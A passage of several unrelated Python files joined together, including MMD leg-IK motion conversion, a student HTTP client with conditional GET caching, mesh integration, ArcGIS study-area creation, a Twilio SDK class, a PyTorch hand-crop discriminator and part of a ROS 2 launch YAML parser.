        prev_sep_fno = 0
        fno = 0
        for fno in fnos:
            leg_fk_3ds_dic = MServiceUtils.calc_global_pos(model, fk_links, motion, fno)
            _, leg_ik_matrixs = MServiceUtils.calc_global_pos(model, ik_links, motion, fno, return_matrix=True)

            # Global toe positions with the ankle rotation applied.
            leg_toe_fk_3ds_dic = MServiceUtils.calc_global_pos(model, toe_fk_links, motion, fno)

            # Matrix of the IK's parent, to express positions relative to it.
            leg_ik_parent_matrix = leg_ik_matrixs[ik_parent_name]

            bf = motion.calc_bf(leg_ik_bone_name, fno)

            # The IK position is the ankle's local position as seen from the
            # IK parent (minus the ankle's rest offset).
            bf.position = leg_ik_parent_matrix.inverted() * (leg_fk_3ds_dic[ankle_bone_name] - (model.bones[ankle_bone_name].position - model.bones[ik_parent_name].position))
            if bf.position.y() < 0:
                bf.position.setY(0)
            bf.rotation = MQuaternion()

            # Register once the IK position is fixed.
            motion.regist_bf(bf, leg_ik_bone_name, fno)

            # Toe global positions with no IK rotation applied yet.
            leg_ik_3ds_dic, leg_ik_matrisxs = MServiceUtils.calc_global_pos(model, toe_ik_links, motion, fno, return_matrix=True)
            [logger.debug("f: %s, leg_ik_3ds_dic[%s]: %s", fno, k, v.to_log()) for k, v in leg_ik_3ds_dic.items()]

            # Toe positions in the leg IK's local space.
            toe_global_pos = leg_ik_3ds_dic[toe_ik_bone_name]
            ankle_child_initial_local_pos = leg_ik_matrisxs[leg_ik_bone_name].inverted() * toe_global_pos
            ankle_child_global_pos = leg_toe_fk_3ds_dic[ankle_child_bone_name]
            ankle_child_local_pos = leg_ik_matrisxs[leg_ik_bone_name].inverted() * ankle_child_global_pos
            ankle_horizonal_pos = leg_ik_matrisxs[leg_ik_bone_name].inverted() * MVector3D(ankle_child_global_pos.x(), model.bones[ankle_child_bone_name].position.y(), ankle_child_global_pos.z())
            ankle_slope = abs(MVector3D.dotProduct(ankle_horizonal_pos.normalized(), ankle_child_local_pos.normalized()))

            if (self.options.ankle_horizonal_flg and (ankle_slope > 0.95)) or toe_global_pos.y() < 0:
                logger.debug("f: %s, %s水平 %s ankle_child_local_pos: %s, ankle_horizonal_pos: %s", fno, direction, ankle_slope, ankle_child_local_pos.to_log(), ankle_horizonal_pos.to_log())
                # Nearly level (or toe underground): snap the foot flat.
                ankle_child_local_pos = ankle_horizonal_pos

            logger.debug("f: %s, ankle_child_initial_local_pos: %s", fno, ankle_child_initial_local_pos.to_log())
            logger.debug("f: %s, ankle_child_local_pos: %s", fno, ankle_child_local_pos.to_log())

            # The IK rotation is the toe direction as seen from the ankle.
            bf.rotation = MQuaternion.rotationTo(ankle_child_initial_local_pos, ankle_child_local_pos)
            logger.debug("f: %s, ik_rotation: %s", fno, bf.rotation.toEulerAngles4MMD().to_log())

            motion.regist_bf(bf, leg_ik_bone_name, fno)

            if fno // 500 > prev_sep_fno and fnos[-1] > 0:
                logger.count(f"【足IK変換 - {leg_ik_bone_name}】", fno, fnos)
                prev_sep_fno = fno // 500

        logger.info("変換完了 【%s足IK】", direction, decoration=MLogger.DECORATION_LINE)

        if self.options.leg_error_tolerance > 0:
            # Pin frames whose IK only jitters within the tolerance.
            logger.info("足IKブレ固定 【%s足IK】", direction, decoration=MLogger.DECORATION_LINE)

            prev_sep_fno = 0
            for prev_fno, next_fno in zip(fnos[:-3], fnos[3:]):
                # Toe-IK tip position at the window start.
                toe_ik_3ds = MServiceUtils.calc_global_pos(model, toe_ik_links, motion, prev_fno)
                prev_toe_pos = toe_ik_3ds[toe_ik_bone_name]
                # Leg-IK position at the window start.
                sole_ik_3ds = MServiceUtils.calc_global_pos(model, ik_links, motion, prev_fno)
                prev_sole_pos = sole_ik_3ds[leg_ik_bone_name]

                toe_poses = []
                sole_poses = []
                for fno in range(prev_fno + 1, next_fno + 1):
                    # Toe-IK tip position (ignore Y below the bone's rest height).
                    toe_ik_3ds = MServiceUtils.calc_global_pos(model, toe_ik_links, motion, fno)
                    toe_poses.append(np.array([toe_ik_3ds[toe_ik_bone_name].x(), max(model.bones[toe_ik_bone_name].position.y(), toe_ik_3ds[toe_ik_bone_name].y()), toe_ik_3ds[toe_ik_bone_name].z()]))
                    # Leg-IK position (ignore Y below the bone's rest height).
                    sole_ik_3ds = MServiceUtils.calc_global_pos(model, ik_links, motion, fno)
                    sole_poses.append(np.array([sole_ik_3ds[leg_ik_bone_name].x(), max(model.bones[leg_ik_bone_name].position.y(), sole_ik_3ds[leg_ik_bone_name].y()), sole_ik_3ds[leg_ik_bone_name].z()]))

                # Pairwise distances from the window-start positions.
                toe_distances = np.linalg.norm(np.array(toe_poses) - prev_toe_pos.data(), ord=2, axis=1)
                sole_distances = np.linalg.norm(np.array(sole_poses) - prev_sole_pos.data(), ord=2, axis=1)

                if np.max(sole_distances) <= self.options.leg_error_tolerance and prev_sole_pos.y() < 0.5 + model.bones[leg_ik_bone_name].position.y():
                    logger.debug("%s足固定(%s-%s): sole: %s", direction, prev_fno, next_fno, sole_distances)
                    # The leg IK only jitters within tolerance: freeze it.
                    prev_bf = motion.calc_bf(leg_ik_bone_name, prev_fno)
                    # Ground it.
                    prev_bf.position.setY(0)
                    motion.regist_bf(prev_bf, leg_ik_bone_name, prev_fno)

                    # Recompute the toe-IK global position.
                    toe_ik_3ds = MServiceUtils.calc_global_pos(model, toe_ik_links, motion, prev_fno)
                    toe_ik_global_pos = toe_ik_3ds[toe_ik_bone_name]

                    for fno in range(prev_fno + 1, next_fno + 1):
                        bf = motion.calc_bf(leg_ik_bone_name, fno)
                        bf.position = prev_bf.position.copy()
                        motion.regist_bf(bf, leg_ik_bone_name, fno)

                    for fno in range(prev_fno, next_fno + 1):
                        # Recompute the toe-IK global position per frame.
                        toe_ik_3ds = MServiceUtils.calc_global_pos(model, toe_ik_links, motion, fno)
                        toe_ik_global_pos = toe_ik_3ds[toe_ik_bone_name]

                        if toe_ik_global_pos.y() < 0:
                            # Toe went underground: rotate it back up to rest height.
                            sole_ik_3ds, sole_mats = MServiceUtils.calc_global_pos(model, ik_links, motion, fno, return_matrix=True)
                            toe_ik_local_prev_pos = sole_mats[leg_ik_bone_name].inverted() * toe_ik_global_pos
                            toe_ik_local_now_pos = sole_mats[leg_ik_bone_name].inverted() * MVector3D(toe_ik_global_pos.x(), model.bones[toe_ik_bone_name].position.y(), toe_ik_global_pos.z())
                            adjust_toe_qq = MQuaternion.rotationTo(toe_ik_local_prev_pos, toe_ik_local_now_pos)
                            logger.debug("%sつま先ゼロ(%s-%s): toe_ik_global_pos: %s, adjust_toe_qq: %s", direction, prev_fno, next_fno, toe_ik_global_pos.to_log(),
                                         adjust_toe_qq.toEulerAngles4MMD().to_log())

                            prev_bf = motion.calc_bf(leg_ik_bone_name, prev_fno)
                            bf = motion.calc_bf(leg_ik_bone_name, fno)
                            bf.rotation *= adjust_toe_qq
                            if fno > prev_fno and MQuaternion.dotProduct(prev_bf.rotation, bf.rotation) > 0.95:
                                # Nearly identical rotation: reuse the previous one.
                                logger.debug("%sつま先回転コピー(%s-%s): toe_ik_global_pos: %s, prev: %s, now: %s", direction, prev_fno, next_fno, toe_ik_global_pos.to_log(),
                                             prev_bf.rotation.toEulerAngles4MMD().to_log(), bf.rotation.toEulerAngles4MMD().to_log())
                                bf.rotation = prev_bf.rotation.copy()
                            motion.regist_bf(bf, leg_ik_bone_name, fno)
                elif np.max(toe_distances) <= self.options.leg_error_tolerance and prev_sole_pos.y() < 0.5 + model.bones[leg_ik_bone_name].position.y():
                    logger.debug("%sつま先固定(%s-%s): sole: %s", direction, prev_fno, next_fno, toe_distances)
                    # Toe jitters within tolerance: move the leg IK so the toe stays put.
                    prev_bf = motion.calc_bf(leg_ik_bone_name, prev_fno)
                    for fidx, fno in enumerate(range(prev_fno + 1, next_fno + 1)):
                        # Toe global position at this frame.
                        toe_pos = MVector3D(toe_poses[fidx])
                        bf = motion.calc_bf(leg_ik_bone_name, fno)
                        bf.position = prev_bf.position.copy() - (toe_pos - prev_toe_pos)
                        motion.regist_bf(bf, leg_ik_bone_name, fno)
                else:
                    logger.debug("×%s固定なし(%s-%s): prev: %s, sole: %s, toe: %s", direction, prev_fno, next_fno, prev_sole_pos.to_log(), sole_distances, toe_distances)

                if prev_fno // 500 > prev_sep_fno:
                    logger.count(f"【{direction}足IKブレ固定】", prev_fno, fnos)
                    prev_sep_fno = prev_fno // 500

        # Turn the leg/toe IK display flags on.
        for showik in self.options.motion.showiks:
            for ikf in showik.ik:
                if ikf.name == leg_ik_bone_name or ikf.name == toe_ik_bone_name:
                    ikf.onoff = 1

        # Remove unnecessary keys if requested.
        if self.options.remove_unnecessary_flg:
            self.options.motion.remove_unnecessary_bf(0, leg_ik_bone_name, self.options.model.bones[leg_ik_bone_name].getRotatable(), \
                                                      self.options.model.bones[leg_ik_bone_name].getTranslatable())

        return True
|
# Http client
# Jason Hurtado
# UCID: jh465
# Section: 003
from datetime import datetime, timezone
import sys
import re
import time
from socket import socket, AF_INET, SOCK_STREAM
#socketAPI.pdf
# Usage: python client.py localhost:12000/filename.html
#
# Downloads the named file over raw HTTP, caching the body in cache.txt
# and its Last-Modified stamp in lastmod.txt so that later runs can issue
# a conditional GET (If-Modified-Since).
argv = sys.argv
url = argv[1]  # web url containing hostname and port where server is running
               # and name of the file to be downloaded
splitURL = url.split("/")
fileName = splitURL[1]
hostName = splitURL[0]
host, _, port_text = hostName.partition(":")
port = int(port_text)


def fetch(request):
    """Send *request* over a fresh TCP connection and return the decoded reply.

    The socket is always closed, even when the request fails.
    """
    client = socket(AF_INET, SOCK_STREAM)
    try:
        client.connect((host, port))
        client.send(request.encode())
        return client.recv(4096).decode()
    finally:
        client.close()


def cache_response(response):
    """Store the response body (cache.txt) and Last-Modified stamp (lastmod.txt)."""
    # The body is everything after the last CRLF-separated header line.
    body = response.split("\r\n")[-1]
    last_modified = response.split("Last-Modified: ")[1].split("\r\n")[0]
    with open("lastmod.txt", "w") as stamp_file:
        stamp_file.write(last_modified)
    with open("cache.txt", "w") as cache_file:
        cache_file.write(body)


#conditional GET requests
try:
    # A previous download exists: issue a conditional GET.
    with open("cache.txt", "r") as cache_file:
        contents = cache_file.read()
    with open("lastmod.txt", "r") as stamp_file:
        last_mod_time = stamp_file.read()
    sendData = "GET /" + fileName + " HTTP/1.1\r\n"
    sendData += "Host: " + hostName + "\r\n"
    sendData += "If-Modified-Since: " + last_mod_time + "\r\n"
    sendData += "\r\n"
    print("Conditional GET request: " + sendData)
    serverContents2 = fetch(sendData)
    print(serverContents2 + "\n")
    # Only cache when the server actually returned new, valid content:
    # 304 means the cached copy is still current; 404 has no body to cache.
    if "304 Not Modified" not in serverContents2 and "404 Not Found" not in serverContents2:
        cache_response(serverContents2)
except FileNotFoundError:
    # First run (no cache yet): plain GET, then populate the cache.
    sendData = "GET /" + fileName + " HTTP/1.1\r\n"
    sendData += "Host: " + hostName + "\r\n"
    sendData += "\r\n"
    print("Sending data to server: " + sendData)
    serverContents = fetch(sendData)
    print(serverContents + "\n")
    if "404 Not Found" not in serverContents:
        cache_response(serverContents)
|
# ===== <code_preproc remove vvv>
import sys
# This line was added to find Hybmesh.py that is not located
# in the current directory or package subdirectory.
# Normally this should be omitted.
sys.path.append("../../../../build/bindings/py")
# ===== <code_preproc remove ^^^>
import math
from Hybmesh import Hybmesh
# target function: Gaussian hill with the center at [0, 0]
def expfun(x, y):
    """Gaussian hill centered at the origin: exp(-(x^2 + y^2) / 0.25)."""
    r_squared = x * x + y * y
    return math.exp(-r_squared / 0.25)
# ===== <code_preproc remove vvv>
# Point Hybmesh at the locally built executable and library
# (only needed when running from the source tree).
Hybmesh.hybmesh_exec_path = "../../../../src/py/"
Hybmesh.hybmesh_lib_path = "../../../../build/bin/"
# ===== <code_preproc remove ^^^>
# Create the Hybmesh connection inside a with-block to guarantee
# its destruction afterwards, even on error.
with Hybmesh() as hm:
    # Loop over progressively finer outer step sizes.
    for h in [0.2, 0.1, 0.05]:
        # Create a rectangle-in-circle grid prototype (unit radius at origin).
        g = hm.add_circ_rect_grid([0, 0], 1.0, h)
        # Vertex coordinates as a plain 1D array [x0, y0, x1, y1, ...].
        vertices = g.raw_vertices()
        # Cell-vertices table as a plain array.
        # The grid is known to contain only quadrangular cells, so the flat
        # cell_vert array splits into groups of four indices and there is no
        # need to call g.raw_tab("cell_dim").
        cell_vert = g.raw_tab("cell_vert")
        # Approximate the integral as the sum over cells of
        # (cell area) * (function value at the cell center).
        result = 0
        it = iter(cell_vert)
        for ind in zip(it, it, it, it):
            # ind holds the four vertex indices for the current cell;
            # x, y are the respective x and y coordinate lists.
            x = list(map(lambda i: vertices[2*i], ind))
            y = list(map(lambda i: vertices[2*i+1], ind))
            # Function value at the approximate cell center (vertex mean).
            f = expfun(sum(x)/4.0, sum(y)/4.0)
            # Quadrilateral area via two cross products relative to vertex 0.
            x1, x2, x3 = x[1] - x[0], x[2] - x[0], x[3] - x[0]
            y1, y2, y3 = y[1] - y[0], y[2] - y[0], y[3] - y[0]
            area = 0.5*(x1*y2-y1*x2 + x2*y3-y2*x3)
            result += f * area
        print("h = {}: integral = {}".format(h, result))
|
##########################
## Designed to work in Arcgis 10.1
## Creates Study Area polygons for all shapefiles within a chosen directory.
## Outputs Study Area features into a subfolder named "StudyAreas".
## Names shapefiles correctly.
## Collects GUI from original habitat map name and transfers across.
## Creates "SUM_CONF" field for values to be entered manually.
##
## Warning: The habitat maps contained within the supplied folder MUST be in a MESH DEF for this script to work.
## Created by: Graeme Duncan, JNCC for EMODnet Seabed Habitats 2014.
## Modified by: Sabrina Agnesi, ISPRA for EMODnet Seabed Habitats 2020.
## Contact: info@emodnet-seabedhabitats.eu
###########################
import arcpy
from arcpy import env
import os
# Allow the script to be re-run: overwrite outputs from a previous run.
env.overwriteOutput = True
print "Please ensure that all habitat maps are named correctly and in a MESH Data Exchange Format"
print ""
root_workspace = raw_input('Paste the full directory path to the folder containing your MESH formatted maps here and press enter: ')
arcpy.env.workspace = root_workspace
# Every feature class directly inside the chosen workspace.
featureList = arcpy.ListFeatureClasses()
# Study Area outputs go into a "StudyAreas" subfolder.
outdir = os.path.join(root_workspace, "StudyAreas")
if not os.path.isdir(outdir):
    try:
        os.makedirs(outdir)
    except OSError:
        raise
for fc in featureList:
    print "Creating StudyArea for %s..." % fc
    fcName, fcExt = os.path.splitext(str(fc))
    # MESH naming convention: the first 8 characters of the map name are its GUI code.
    fcGUI = fcName[:8]
    print fcGUI
    outfc = outdir + "\\" + fcGUI + "_StudyArea" + fcExt
    desc = arcpy.Describe(fc)
    spatref = desc.spatialReference
    extent = desc.extent
    # Build a rectangle polygon from the layer's bounding extent.
    pts = [arcpy.Point(extent.XMin, extent.YMin),
           arcpy.Point(extent.XMax, extent.YMin),
           arcpy.Point(extent.XMax, extent.YMax),
           arcpy.Point(extent.XMin, extent.YMax)]
    array = arcpy.Array(items=pts)
    poly = arcpy.Polygon(array, spatref)
    try:
        arcpy.CopyFeatures_management(poly, outfc)
    except Exception as e:
        print "Error creating StudyArea shapefile for %s" % fc
        print e.message
    else:
        print "Successfully created StudyArea shapefile for %s" % fc
        print outfc
        print "Creating DEF fields..."
        # DEF attribute fields; GUI is copied from the source map name.
        # NOTE(review): the file header promises a "SUM_CONF" field, but no
        # such field is added here — confirm whether it was dropped on purpose.
        arcpy.AddField_management(outfc, "GUI", "TEXT", "", "",8)
        arcpy.AddField_management(outfc, "UUID", "TEXT", "","",36)
        arcpy.AddField_management(outfc, "AVAILABLE", "TEXT","","",13)
        arcpy.CalculateField_management(outfc, "GUI", '"' + fcGUI + '"', "PYTHON")
        arcpy.DeleteField_management(outfc,"Id")
    print "_______________________"
print "************"
print "* COMPLETE *"
print "************"
|
# Read integers until the user enters 0, then report min, max and average.
# Fix: the original appended the terminating 0 and then removed it, and
# crashed (ValueError / ZeroDivisionError) when 0 was the very first input.
values = []
while True:
    entry = int(input("Enter a value (0 to end): "))
    print(entry)
    if entry == 0:
        break
    values.append(entry)
if values:
    print("Min:", min(values))
    print("Max:", max(values))
    print("Avg: {:.1f}".format(sum(values) / len(values)))
else:
    print("No values entered.")
# coding=utf-8
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base.domain import Domain
from twilio.rest.preview.marketplace import Marketplace
from twilio.rest.preview.sync import Sync
from twilio.rest.preview.wireless import Wireless
class Preview(Domain):
    """Twilio Preview domain: entry point for the preview REST API versions."""

    def __init__(self, twilio):
        """
        Initialize the Preview Domain

        :returns: Domain for Preview
        :rtype: twilio.rest.preview.Preview
        """
        super(Preview, self).__init__(twilio)
        self.base_url = 'https://preview.twilio.com'
        # Version instances, constructed lazily by the properties below.
        self._sync = None
        self._wireless = None
        self._marketplace = None

    @property
    def sync(self):
        """
        Lazily construct and return the ``sync`` version of preview.

        :rtype: twilio.rest.preview.sync.Sync
        """
        if self._sync is None:
            self._sync = Sync(self)
        return self._sync

    @property
    def wireless(self):
        """
        Lazily construct and return the ``wireless`` version of preview.

        :rtype: twilio.rest.preview.wireless.Wireless
        """
        if self._wireless is None:
            self._wireless = Wireless(self)
        return self._wireless

    @property
    def marketplace(self):
        """
        Lazily construct and return the ``marketplace`` version of preview.

        :rtype: twilio.rest.preview.marketplace.Marketplace
        """
        if self._marketplace is None:
            self._marketplace = Marketplace(self)
        return self._marketplace

    @property
    def services(self):
        """
        Shortcut to the Sync version's service list.

        :rtype: twilio.rest.preview.sync.service.ServiceList
        """
        return self.sync.services

    @property
    def commands(self):
        """
        Shortcut to the Wireless version's command list.

        :rtype: twilio.rest.preview.wireless.command.CommandList
        """
        return self.wireless.commands

    @property
    def rate_plans(self):
        """
        Shortcut to the Wireless version's rate-plan list.

        :rtype: twilio.rest.preview.wireless.rate_plan.RatePlanList
        """
        return self.wireless.rate_plans

    @property
    def sims(self):
        """
        Shortcut to the Wireless version's SIM list.

        :rtype: twilio.rest.preview.wireless.sim.SimList
        """
        return self.wireless.sims

    @property
    def available_add_ons(self):
        """
        Shortcut to the Marketplace version's available add-on list.

        :rtype: twilio.rest.preview.marketplace.available_add_on.AvailableAddOnList
        """
        return self.marketplace.available_add_ons

    @property
    def installed_add_ons(self):
        """
        Shortcut to the Marketplace version's installed add-on list.

        :rtype: twilio.rest.preview.marketplace.installed_add_on.InstalledAddOnList
        """
        return self.marketplace.installed_add_ons

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Preview>'
|
import math

# Area of a regular polygon from its side length and number of sides:
# S = n * s^2 / (4 * tan(pi / n)).
side = float(input('Довжина сторони '))
count = float(input('Кількість сторін '))
area = (count * side ** 2) / (4 * math.tan(math.pi / count))
print(area)
import datetime
def printTimeStamp(name):
    """Print the program author credit followed by the current timestamp."""
    for line in ('Автор програми:' + name,
                 'Час компіляції: ' + str(datetime.datetime.now())):
        print(line)


printTimeStamp('Nehodenko and Neskoromny Yaroslav')
|
import torch
import numpy as np
from pathlib import Path
from tqdm import tqdm
from mpl_toolkits.mplot3d import Axes3D
from src import ROOT
from src.models.base_model import Base_Model
from src.datasets import get_dataloader, get_dataset
from src.models.hand_crop_disc.hand_crop_disc_net import DCGAN_Discriminator
from src.optimizers import get_optimizer
from src.schedulers import get_scheduler
from src.utils import *
from src.datasets.transforms import *
class Hand_Crop_Disc_Model(Base_Model):
    """Discriminator model that scores whether a cropped image contains a hand.

    NOTE(review): predict_step/save_predictions use attributes (self.D,
    self.num_joints, self.hand_root, self.exp_dir, self.load_epoch and the
    *_list accumulators) that are never assigned in this class — presumably
    they come from Base_Model or a subclass; confirm before relying on them.
    """

    def __init__(self, cfg):
        """Build network, optimizer, scheduler, dataloaders and loss from *cfg*.

        NOTE(review): self.net is only assigned when cfg['net'] == 'dcgan',
        and self.loss only for 'bce'/'mse' — any other config value leaves
        the attribute unset and fails later with AttributeError.
        """
        super().__init__(cfg)
        if cfg['net'] == 'dcgan':
            self.net = DCGAN_Discriminator(cfg).cuda()
        self.optimizer = get_optimizer(cfg, self.net)
        self.scheduler = get_scheduler(cfg, self.optimizer)
        self.train_dataloader = get_dataloader(cfg, get_dataset(cfg, 'train'))
        self.val_dataloader = get_dataloader(cfg, get_dataset(cfg, 'val'))
        self.pretrain = cfg['pretrain']
        self.load_weights()
        # Side length images are resized to before entering the network.
        self.img_rsz = int(cfg['img_rsz'])
        if cfg['loss'] == 'bce':
            self.loss = torch.nn.BCELoss()
        elif cfg['loss'] == 'mse':
            self.loss = torch.nn.MSELoss()
        # Per-batch validation losses, averaged in get_valid_loss().
        self.val_loss = []

    # ========================================================
    # TRAINING
    # ========================================================
    def train_step(self, data_load):
        """Run one optimization step on a (img, is_hand) batch.

        :param data_load: tuple of (image batch, binary is-hand labels)
        :return: dict with the formatted scalar training loss
        """
        img, is_hand = data_load
        img = img.cuda()
        # Labels must be float for BCE/MSE against the network output.
        is_hand = is_hand.type(torch.FloatTensor).cuda()
        out = self.net(img)
        loss = self.loss(out, is_hand)
        self.optimizer.zero_grad()
        loss.backward()
        self.optimizer.step()
        loss_dict = {
            'loss' : '{:04f}'.format(loss.item()),
        }
        return loss_dict

    # ========================================================
    # VALIDATION
    # ========================================================
    def valid_step(self, data_load):
        """Accumulate the loss of one validation batch into self.val_loss."""
        img, is_hand = data_load
        img = img.cuda()
        is_hand = is_hand.type(torch.FloatTensor).cuda()
        out = self.net(img)
        loss = self.loss(out, is_hand)
        self.val_loss.append(loss.item())

    def get_valid_loss(self):
        """Return the mean validation loss and reset the accumulator."""
        val_loss = np.mean(self.val_loss)
        val_loss_dict = {
            'val_loss' : val_loss,
        }
        self.val_loss = []
        return val_loss_dict

    # ========================================================
    # PREDICTION
    # ========================================================
    def predict_step(self, data_load):
        """Decode per-joint UVD predictions and confidences from the network.

        NOTE(review): this reshapes the net output to
        (batch, num_joints*3+1, D, H, W) — that assumes a different head than
        the scalar is-hand output trained above; confirm which network this
        path is meant for.
        """
        img = data_load[0]
        img = img.cuda()
        pred_hand = self.net(img)
        batch_size = img.shape[0]
        W = pred_hand.shape[3]
        H = pred_hand.shape[2]
        D = self.D
        pred_hand = pred_hand.view(batch_size, self.num_joints*3+1, D, H, W)
        # Reorder to (batch, channels, H, W, D) for per-cell decoding.
        pred_hand = pred_hand.permute(0, 1, 3, 4, 2)
        for batch in range(batch_size):
            # Hand
            cur_pred_hand = pred_hand[batch]
            # First num_joints*3 channels: per-joint (u, v, d) offsets;
            # last channel: confidence map.
            pred_uvd = cur_pred_hand[:self.num_joints*3, :, :, :].view(self.num_joints, 3, H, W, D)
            pred_conf = torch.sigmoid(cur_pred_hand[self.num_joints*3, :, :, :])
            FT = torch.FloatTensor
            yv, xv, zv = torch.meshgrid([torch.arange(H),
                                         torch.arange(W),
                                         torch.arange(D)])
            grid_x = xv.repeat((self.num_joints, 1, 1, 1)).type(FT).cuda()
            grid_y = yv.repeat((self.num_joints, 1, 1, 1)).type(FT).cuda()
            grid_z = zv.repeat((self.num_joints, 1, 1, 1)).type(FT).cuda()
            # The root joint is predicted as an absolute sigmoid offset.
            pred_uvd[self.hand_root, :, :, :, :] = \
                torch.sigmoid(pred_uvd[self.hand_root, :, :, :, :])
            # Add the cell grid and normalize each axis to [0, 1].
            pred_uvd[:, 0, :, :, :] = (pred_uvd[:, 0, :, :, :] + grid_x)/W
            pred_uvd[:, 1, :, :, :] = (pred_uvd[:, 1, :, :, :] + grid_y)/H
            pred_uvd[:, 2, :, :, :] = (pred_uvd[:, 2, :, :, :] + grid_z)/D
            pred_uvd = pred_uvd.contiguous().view(self.num_joints, 3, -1)
            pred_conf = pred_conf.contiguous().view(-1)
            # Keep the 10 highest-confidence cells; index 0 is the best.
            top10_pred_uvd = []
            top10_idx = torch.topk(pred_conf, 10)[1]
            for idx in top10_idx:
                top10_pred_uvd.append(pred_uvd[:, :, idx].cpu().numpy())
            self.best_pred_uvd_list.append(top10_pred_uvd[0])
            self.top10_pred_uvd_list.append(top10_pred_uvd)
            self.pred_conf_list.append(pred_conf.cpu().numpy())

    def save_predictions(self, data_split):
        """Write best/top-10/confidence predictions to text files and reset buffers.

        :param data_split: split name used in the output file names
        """
        pred_save = "predict_{}_{}_best.txt".format(self.load_epoch,
                                                    data_split)
        pred_file = self.exp_dir/pred_save
        np.savetxt(pred_file, np.reshape(self.best_pred_uvd_list, (-1, self.num_joints*3)))
        pred_save = "predict_{}_{}_top10.txt".format(self.load_epoch,
                                                     data_split)
        pred_file = self.exp_dir/pred_save
        np.savetxt(pred_file, np.reshape(self.top10_pred_uvd_list, (-1, self.num_joints*3*10)))
        pred_save = "predict_{}_{}_conf.txt".format(self.load_epoch,
                                                    data_split)
        pred_file = self.exp_dir/pred_save
        np.savetxt(pred_file, self.pred_conf_list)
        self.pred_list = []
        self.best_pred_uvd_list = []
        self.top10_pred_uvd_list = []
        self.pred_conf_list = []

    # ========================================================
    # DETECT
    # ========================================================
    def detect(self, img, bbox):
        """Score one image (optionally cropped to *bbox*), show it and print the score."""
        import matplotlib.pyplot as plt
        import torchvision
        if bbox is not None:
            # Crop, resize and convert to a normalized torch batch of one.
            img_crop = get_img_crop_from_bbox(img, bbox)
            tfrm = []
            tfrm.append(ImgResize((self.img_rsz)))
            tfrm.append(ImgToTorch())
            transform = torchvision.transforms.Compose(tfrm)
            sample = {'img': img_crop}
            sample = transform(sample)
            img_crop = sample['img']
            img_crop = img_crop.unsqueeze(0).cuda()
        else:
            img_crop = img.cuda()
        out = self.net(img_crop)
        img_crop = ImgToNumpy()(img_crop.cpu())[0]
        fig, ax = plt.subplots()
        plt.axis('off')
        ax.imshow(img_crop)
        plt.show()
        print(out.item())

    def detect_out(self, img, bbox):
        """Same as detect() but return (cropped image, score) instead of displaying."""
        import matplotlib.pyplot as plt
        import torchvision
        if bbox is not None:
            img_crop = get_img_crop_from_bbox(img, bbox)
            tfrm = []
            tfrm.append(ImgResize((self.img_rsz)))
            tfrm.append(ImgToTorch())
            transform = torchvision.transforms.Compose(tfrm)
            sample = {'img': img_crop}
            sample = transform(sample)
            img_crop = sample['img']
            img_crop = img_crop.unsqueeze(0).cuda()
        else:
            img_crop = img.cuda()
        out = self.net(img_crop)
        img_crop = ImgToNumpy()(img_crop.cpu())[0]
        return img_crop, out.item()
# Copyright 2019 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for YAML Entity class."""
from typing import List
from typing import Optional
from typing import Text
from typing import Union
from launch.frontend import Entity as BaseEntity
from launch.frontend.type_utils import check_is_list_entity
from launch.utilities.type_utils import AllowedTypesType
from launch.utilities.type_utils import AllowedValueType
from launch.utilities.type_utils import is_instance_of
class Entity(BaseEntity):
    """Single item in the intermediate YAML front_end representation."""

    def __init__(
        self,
        element: dict,
        type_name: Optional[Text] = None,
        *,
        parent: Optional['Entity'] = None
    ) -> None:
        """Create an Entity.

        :param element: the parsed YAML payload for this entity
        :param type_name: name of the entity type
        :param parent: the enclosing Entity, if any
        """
        self.__type_name = type_name
        self.__element = element
        self.__parent = parent
        # Keys consumed so far; leftovers are reported by
        # assert_entity_completely_parsed().
        self.__read_keys = set()
        self.__children_called = False

    @property
    def type_name(self) -> Text:
        """Get Entity type."""
        return self.__type_name

    @property
    def parent(self) -> Optional['Entity']:
        """Get Entity parent."""
        return self.__parent

    @property
    def children(self) -> List['Entity']:
        """Get the Entity's children."""
        self.__children_called = True
        if not isinstance(self.__element, (dict, list)):
            raise TypeError(
                f'Expected a dict or list, got {type(self.element)}:'
                f'\n---\n{self.__element}\n---'
            )
        if isinstance(self.__element, dict):
            # A dict-shaped entity must carry its subentities under 'children'.
            if 'children' not in self.__element:
                raise ValueError(
                    f'Expected entity `{self.__type_name}` to have children entities.'
                    f'That can be a list of subentities or a dictionary with a `children` '
                    'list element')
            self.__read_keys.add('children')
            children = self.__element['children']
        else:
            children = self.__element
        entities = []
        for child in children:
            # Each subentity is a single-key mapping: {type_name: payload}.
            if len(child) != 1:
                raise RuntimeError(
                    'Subentities must be a dictionary with only one key'
                    ', which is the entity type')
            type_name = list(child.keys())[0]
            entities.append(Entity(child[type_name], type_name))
        return entities

    def assert_entity_completely_parsed(self) -> None:
        """Raise ValueError if any part of the element was never read."""
        if isinstance(self.__element, list):
            if not self.__children_called:
                raise ValueError(
                    f'Unexpected nested entity(ies) found in `{self.__type_name}`: '
                    f'{self.__element}')
            return
        unparsed_keys = set(self.__element.keys()) - self.__read_keys
        if unparsed_keys:
            raise ValueError(
                f'Unexpected key(s) found in `{self.__type_name}`: {unparsed_keys}'
            )

    def get_attr(
        self,
        name: Text,
        *,
        data_type: AllowedTypesType = str,
        optional: bool = False,
        can_be_str: bool = True,
    ) -> Optional[Union[
        AllowedValueType,
        List['Entity'],
    ]]:
        """
        Access an attribute of the entity.

        See :py:meth:`launch.frontend.Entity.get_attr`.

        `launch_yaml` does not apply type coercion,
        it only checks if the read value is of the correct type.
        """
        if name not in self.__element:
            if not optional:
                raise AttributeError(
                    "Can not find attribute '{}' in Entity '{}'".format(
                        name, self.type_name))
            else:
                return None
        self.__read_keys.add(name)
        data = self.__element[name]
        # A list-of-entities type wraps each child dict in a new Entity.
        if check_is_list_entity(data_type):
            if isinstance(data, list) and isinstance(data[0], dict):
                return [Entity(child, name) for child in data]
            raise TypeError(
                "Attribute '{}' of Entity '{}' expected to be a list of dictionaries.".format(
